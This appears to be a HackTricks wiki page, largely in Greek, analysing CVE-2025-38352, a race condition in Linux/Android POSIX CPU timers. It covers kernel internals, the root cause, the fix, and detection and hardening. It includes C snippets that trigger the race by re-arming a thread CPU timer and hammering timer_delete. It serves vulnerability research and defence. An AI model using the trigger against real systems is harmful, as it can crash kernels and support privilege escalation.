POSIX CPU Timers TOCTOU race (CVE-2025-38352)

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Αυτή η σελίδα τεκμηριώνει ένα TOCTOU race condition στα Linux/Android POSIX CPU timers που μπορεί να καταστρέψει την κατάσταση του timer και να προκαλέσει κατάρρευση του kernel, και κάτω από ορισμένες συνθήκες να οδηγηθεί σε privilege escalation.

  • Επηρεαζόμενο συστατικό: kernel/time/posix-cpu-timers.c
  • Primitive: expiry vs deletion race under task exit
  • Εξαρτάται από ρύθμιση: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

Γρήγορη επισκόπηση εσωτερικών (σχετικό για exploitation)

  • Τρία ρολόγια CPU διαχειρίζονται την καταγραφή για timers μέσω cpu_clock_sample():
  • CPUCLOCK_PROF: utime + stime
  • CPUCLOCK_VIRT: utime only
  • CPUCLOCK_SCHED: task_sched_runtime()
  • Η δημιουργία timer συνδέει έναν timer με ένα task/pid και αρχικοποιεί τους timerqueue nodes:
static int posix_cpu_timer_create(struct k_itimer *new_timer) {
struct pid *pid;
rcu_read_lock();
pid = pid_for_clock(new_timer->it_clock, false);
if (!pid) { rcu_read_unlock(); return -EINVAL; }
new_timer->kclock = &clock_posix_cpu;
timerqueue_init(&new_timer->it.cpu.node);
new_timer->it.cpu.pid = get_pid(pid);
rcu_read_unlock();
return 0;
}
  • Η ενεργοποίηση εισάγει εγγραφές στο per-base timerqueue και μπορεί να ενημερώσει την next-expiry cache:
static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
struct posix_cputimer_base *base = timer_base(timer, p);
struct cpu_timer *ctmr = &timer->it.cpu;
u64 newexp = cpu_timer_getexpires(ctmr);
if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
if (newexp < base->nextevt) base->nextevt = newexp;
}
  • Η γρήγορη διαδρομή αποφεύγει δαπανηρή επεξεργασία εκτός αν οι αποθηκευμένες λήξεις υποδεικνύουν πιθανή πυροδότηση:
static inline bool fastpath_timer_check(struct task_struct *tsk) {
struct posix_cputimers *pct = &tsk->posix_cputimers;
if (!expiry_cache_is_inactive(pct)) {
u64 samples[CPUCLOCK_MAX];
task_sample_cputime(tsk, samples);
if (task_cputimers_expired(samples, pct))
return true;
}
return false;
}
  • Η λήξη συλλέγει τα ληγμένα χρονόμετρα, τα σημειώνει ως ενεργοποιημένα, τα μετακινεί εκτός ουράς; η πραγματική παράδοση αναβάλλεται:
#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
struct list_head *firing, u64 now) {
struct timerqueue_node *next; int i = 0;
while ((next = timerqueue_getnext(head))) {
struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
u64 expires = cpu_timer_getexpires(ctmr);
if (++i == MAX_COLLECTED || now < expires) return expires;
ctmr->firing = 1;                           // critical state
rcu_assign_pointer(ctmr->handling, current);
cpu_timer_dequeue(ctmr);
list_add_tail(&ctmr->elist, firing);
}
return U64_MAX;
}

Δύο τρόποι επεξεργασίας λήξης

  • CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: η λήξη αναβάλλεται μέσω task_work στην στοχευμένη διεργασία
  • CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: η λήξη χειρίζεται απευθείας στο πλαίσιο IRQ
void run_posix_cpu_timers(void) {
struct task_struct *tsk = current;
__run_posix_cpu_timers(tsk);
}
#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return;
tsk->posix_cputimers_work.scheduled = true;
task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
lockdep_posixtimer_enter();
handle_posix_cpu_timers(tsk);                  // IRQ-context path
lockdep_posixtimer_exit();
}
#endif

Στο IRQ-context path, η firing list επεξεργάζεται εκτός του sighand

static void handle_posix_cpu_timers(struct task_struct *tsk) {
struct k_itimer *timer, *next; unsigned long flags, start;
LIST_HEAD(firing);
if (!lock_task_sighand(tsk, &flags)) return;   // may fail on exit
do {
start = READ_ONCE(jiffies); barrier();
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
} while (!posix_cpu_timers_enable_work(tsk, start));
unlock_task_sighand(tsk, &flags);              // race window opens here
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
int cpu_firing;
spin_lock(&timer->it_lock);
list_del_init(&timer->it.cpu.elist);
cpu_firing = timer->it.cpu.firing;         // read then reset
timer->it.cpu.firing = 0;
if (likely(cpu_firing >= 0)) cpu_timer_fire(timer);
rcu_assign_pointer(timer->it.cpu.handling, NULL);
spin_unlock(&timer->it_lock);
}
}

Root cause: TOCTOU μεταξύ λήξης σε χρόνο IRQ και ταυτόχρονης διαγραφής κατά την έξοδο της διεργασίας

Preconditions

  • CONFIG_POSIX_CPU_TIMERS_TASK_WORK είναι απενεργοποιημένο (διαδρομή IRQ σε χρήση)
  • Η στοχευόμενη διεργασία εξέρχεται αλλά δεν έχει πλήρως συλλεχθεί (reaped)
  • Ένα άλλο νήμα καλεί ταυτόχρονα posix_cpu_timer_del() για τον ίδιο timer

Sequence

  1. update_process_times() προκαλεί run_posix_cpu_timers() σε IRQ context για τη διεργασία που εξέρχεται.
  2. collect_timerqueue() ορίζει ctmr->firing = 1 και μετακινεί τον timer στη προσωρινή λίστα firing.
  3. handle_posix_cpu_timers() αποδεσμεύει το sighand μέσω unlock_task_sighand() για να παραδώσει τους timers εκτός του lock.
  4. Αμέσως μετά το unlock, η διεργασία που εξέρχεται μπορεί να συλλεχθεί (reaped); ένα αδελφό νήμα εκτελεί posix_cpu_timer_del().
  5. Σε αυτό το παράθυρο, η posix_cpu_timer_del() μπορεί να αποτύχει να αποκτήσει το state μέσω cpu_timer_task_rcu()/lock_task_sighand() και έτσι να παραλείψει την κανονική in-flight προστασία που ελέγχει timer->it.cpu.firing. Η διαγραφή προχωρά σαν να μην ήταν firing, διαφθείροντας το state ενώ η λήξη χειρίζεται, οδηγώντας σε crashes/UB.

Why TASK_WORK mode is safe by design

  • Με CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, η λήξη αναβάλλεται σε task_work; το exit_task_work τρέχει πριν το exit_notify, οπότε η επικαλύψη χρόνου IRQ με τη συλλογή (reaping) δεν συμβαίνει.
  • Ακόμη και τότε, αν η διεργασία ήδη εξέρχεται, το task_work_add() αποτυγχάνει; το gating στο exit_state καθιστά και τις δύο λειτουργίες συνεπείς.

Fix (Android common kernel) and rationale

  • Προσθήκη πρώιμης επιστροφής αν η current task εξέρχεται, ώστε να μπλοκάρεται όλη η επεξεργασία:
// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
return;
  • Αυτό αποτρέπει την είσοδο σε handle_posix_cpu_timers() για exiting tasks, εξαλείφοντας το παράθυρο όπου η posix_cpu_timer_del() θα μπορούσε να χάνει it.cpu.firing και να race με την expiry processing.

Impact

  • Η διαφθορά μνήμης του kernel σε δομές timer κατά τη συγχρονισμένη expiry/deletion μπορεί να προκαλέσει άμεσες καταρρεύσεις (DoS) και αποτελεί ισχυρό primitive προς privilege escalation λόγω ευκαιριών για αυθαίρετη manipulation του kernel-state.

Triggering the bug (safe, reproducible conditions) Build/config

  • Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n και χρησιμοποιήστε έναν kernel χωρίς το exit_state gating fix.

Runtime strategy

  • Target a thread που πρόκειται να exit και attach ένα CPU timer σε αυτό (per-thread or process-wide clock):
  • For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, …)
  • For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, …)
  • Arm with a very short initial expiration and small interval to maximize IRQ-path entries:
static timer_t t;
static void setup_cpu_timer(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
sev.sigev_signo = SIGUSR1;
if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
struct itimerspec its = {0};
its.it_value.tv_nsec = 1;           // fire ASAP
its.it_interval.tv_nsec = 1;        // re-fire
if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}
  • Από ένα sibling thread, διαγράψτε ταυτόχρονα τον ίδιο timer ενώ το target thread τερματίζει:
void *deleter(void *arg) {
for (;;) (void)timer_delete(t);     // hammer delete in a loop
}
  • Επιταχυντές αγώνα: υψηλός scheduler tick rate, φόρτος CPU, επαναλαμβανόμενοι κύκλοι τερματισμού/αναδημιουργίας νημάτων. Το crash συνήθως εμφανίζεται όταν posix_cpu_timer_del() παραλείπει να αντιληφθεί το firing λόγω αποτυχίας στην αναζήτηση/κλείδωμα του task αμέσως μετά το unlock_task_sighand().

Detection and hardening

  • Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
  • Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.

Audit hotspots (for reviewers)

  • update_process_times() → run_posix_cpu_timers() (IRQ)
  • __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
  • collect_timerqueue(): sets ctmr->firing and moves nodes
  • handle_posix_cpu_timers(): drops sighand before firing loop
  • posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap

Notes for exploitation research

  • Η αποκαλυφθείσα συμπεριφορά αποτελεί ένα αξιόπιστο kernel crash primitive· η μετατροπή της σε privilege escalation συνήθως απαιτεί επιπλέον ελεγχόμενη επικάλυψη (object lifetime ή write-what-where influence), κάτι πέρα από το πεδίο αυτής της περίληψης. Θεωρήστε κάθε PoC πιθανώς επικίνδυνο και εκτελέστε το μόνο σε emulators/VMs.

Δείτε επίσης

Ksmbd Streams Xattr Oob Write Cve 2025 37947

References

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks